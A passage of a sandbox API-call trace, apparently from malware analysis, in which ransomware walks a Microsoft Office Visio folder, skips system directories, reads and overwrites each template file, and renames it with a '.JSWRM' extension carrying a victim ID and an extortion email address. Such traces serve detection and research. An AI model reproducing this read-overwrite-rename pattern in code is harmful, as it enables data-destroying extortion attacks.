(lpString1="CHART_U.VSSX", lpString2="system volume information") returned -1 [0146.588] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="msocache") returned -1 [0146.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.589] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=132461) returned 1 [0146.589] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.589] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x20560, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x20560, lpOverlapped=0x0) returned 1 [0146.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.601] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x20560, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x20560, lpOverlapped=0x0) returned 1 [0146.602] CloseHandle (hObject=0x314) returned 1 [0146.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.605] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49f9415, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49f9415, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49f9415, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x9614, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CHART_U.VSTX", cAlternateFileName="CHART_~2.VST")) returned 1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2=".") returned 1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="..") returned 1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="...") returned 1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="windows") returned -1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="recovery") returned -1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="perflogs") returned -1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="documents and settings") returned -1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="system volume information") returned -1 [0146.605] lstrcmpiW (lpString1="CHART_U.VSTX", lpString2="msocache") returned -1 [0146.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0146.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0146.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.607] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=38420) returned 1 [0146.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.607] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9610, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x9610, lpOverlapped=0x0) returned 1 [0146.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.611] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9610, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x9610, lpOverlapped=0x0) returned 1 [0146.611] CloseHandle (hObject=0x314) returned 1 [0146.611] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.612] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2e8e3f2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2e8e3f2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2e8e3f2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc943, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMOLE_M.VSSX", cAlternateFileName="COMOLE~2.VSS")) returned 1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2=".") returned 1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="..") returned 1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="...") returned 1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="windows") returned -1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="recovery") returned -1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="perflogs") returned -1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="documents and settings") returned -1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="system volume information") returned -1 [0146.613] lstrcmpiW (lpString1="COMOLE_M.VSSX", lpString2="msocache") returned -1 [0146.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.614] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=51523) returned 1 [0146.615] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.615] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc940, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xc940, lpOverlapped=0x0) returned 1 [0146.620] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.620] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc940, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xc940, lpOverlapped=0x0) returned 1 [0146.620] CloseHandle (hObject=0x314) returned 1 [0146.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c5b962, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4c5b962, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c5b962, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4cd5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMOLE_M.VSTX", cAlternateFileName="COMOLE~2.VST")) returned 1 [0146.621] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2=".") returned 1 [0146.621] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="..") returned 1 [0146.621] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="...") returned 1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="windows") returned -1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="recovery") returned -1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="perflogs") returned -1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="documents and settings") returned -1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="system volume information") returned -1 [0146.622] lstrcmpiW (lpString1="COMOLE_M.VSTX", lpString2="msocache") returned -1 [0146.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.623] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19669) returned 1 [0146.623] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.624] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4cd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4cd0, lpOverlapped=0x0) returned 1 [0146.626] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.626] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4cd0, lpOverlapped=0x0) returned 1 [0146.627] CloseHandle (hObject=0x314) returned 1 [0146.627] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.628] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x290acd1, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x290acd1, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2930e76, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc1c3, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMOLE_U.VSSX", cAlternateFileName="COMOLE~1.VSS")) returned 1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2=".") returned 1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="..") returned 1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="...") returned 1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="windows") returned -1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="recovery") returned -1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="perflogs") returned -1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="documents and settings") returned -1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="system volume information") returned -1 [0146.628] lstrcmpiW (lpString1="COMOLE_U.VSSX", lpString2="msocache") returned -1 [0146.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.629] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=49603) returned 1 [0146.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.629] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc1c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xc1c0, lpOverlapped=0x0) returned 1 [0146.666] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.666] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc1c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xc1c0, lpOverlapped=0x0) returned 1 [0146.667] CloseHandle (hObject=0x314) returned 1 [0146.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.669] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49f9415, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49f9415, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49f9415, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4c4c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMOLE_U.VSTX", cAlternateFileName="COMOLE~1.VST")) returned 1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2=".") returned 1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="..") returned 1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="...") returned 1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="windows") returned -1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="recovery") returned -1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="perflogs") returned -1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="documents and settings") returned -1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="system volume information") returned -1 [0146.669] lstrcmpiW (lpString1="COMOLE_U.VSTX", lpString2="msocache") returned -1 [0146.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMOLE_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMOLE_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.670] 